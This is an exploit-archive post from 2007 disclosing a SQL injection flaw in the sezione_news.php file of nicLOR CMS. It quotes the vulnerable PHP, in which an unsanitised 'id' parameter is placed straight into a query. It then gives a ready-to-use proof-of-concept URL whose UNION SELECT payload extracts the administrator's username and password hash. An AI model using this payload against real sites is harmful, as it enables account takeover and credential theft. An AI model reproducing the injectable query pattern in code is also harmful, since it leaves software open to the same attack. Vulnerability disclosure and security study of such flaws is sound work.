nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability
# Published : 2007-12-21
# Author : x0kster
# Previous Title : zBlog 1.2 Remote SQL Injection Vulnerability
# Next Title : NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability

Name            :  nicLOR-CMS SQL Injection Vulnerability.
Author          :  x0kster
Email           :  x0kster@gmail.com
Script Download :  http://www.niclor.net/prodotti/16-04-06-niclor_cms.zip
Date            :  21/12/2007

#SQL Injection in sezione_news.php

   <?php
   [...]
   $intSezioneID = $_GET['id'];
   [...]
   $strSQL = "SELECT articolo.intArticoloID, "
           . "[...]"        
           . " HAVING articolo.intSezioneID = $intSezioneID"
           . "[...]";
   [...]
   ?>

  So we can exploit the $intSezioneID and execute an sql injection.

  PoC:
  http://example.com/nicLOR-CMS/index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login/*

  And then we'll get the username and the hash of the admin.

# www.Syue.com [2007-12-21]